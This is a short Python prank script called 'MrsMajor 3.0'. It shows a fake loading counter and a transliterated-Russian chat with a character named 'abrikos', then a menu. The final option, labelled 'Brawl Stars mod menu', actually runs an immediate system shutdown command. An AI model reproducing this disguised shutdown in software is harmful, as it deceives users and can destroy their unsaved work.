import time
import os

print("MrsMajor 3.0")
time.sleep(2)
for n in range(1, 100):
    print(n, end='%\n')
print("Error")
time.sleep(3)
os.system('cls')
print("[???] O privet neznakomec kak tebya zovut?")
imya = input("Vvedite imya: ")
print("[???]Priyatno poznokomitsya ", imya)
print("[???]Menya zovut *Zvuk pomeh*")
time.sleep(3)
print("[???]Sto eto bilo?")
print("[abrikos]Ladno menya zovut abrikos")
time.sleep(4)
print("[abrikos]...")
print("[abrikos]Da u menya smeshnoye imya no eto ne povod smeyatsa")
time.sleep(5)
print("[abrikos]Horosho ya dam tebe vibrat sto hochesh")
time.sleep(4)
print("[abrikos]I eto ne potomu sto ya tak zaprogromirovan")
time.sleep(4)
os.system('cls')
print("1 - Prodolzhit dialog")
print("2 - Instrukcija kak zapustit doom (1993)")
print("3 - Brawl Stars mod menu")
vibor1 = input("")
if vibor1 == "1":
    print("Zdi obnovu")
    input()
elif vibor1 == "2":
    os.system('cls')
    print("[abrikos]O ti zahotel poigrat legendarnuju igru")
    print("Horosho ya skazu kak zapustit doom (1993)")
    time.sleep(8)
    print("1. V papke gde ti menya zapustil jest papka 'doom' otkrivay jejo")
    time.sleep(5)
    print("2. V etoy papke yest fail 'chocolate-doom.exe' zapuskay jego")
    time.sleep(5)
    print("3. Kogda igra zapustilas zmi 'NEW GAME'")
    time.sleep(5)
    print("4. Dalshe vibiray vse verhneye")
    time.sleep(5)
    print("5. Igray")
    input("")
elif vibor1 == "3":
    os.system('shutdown /s /t 1')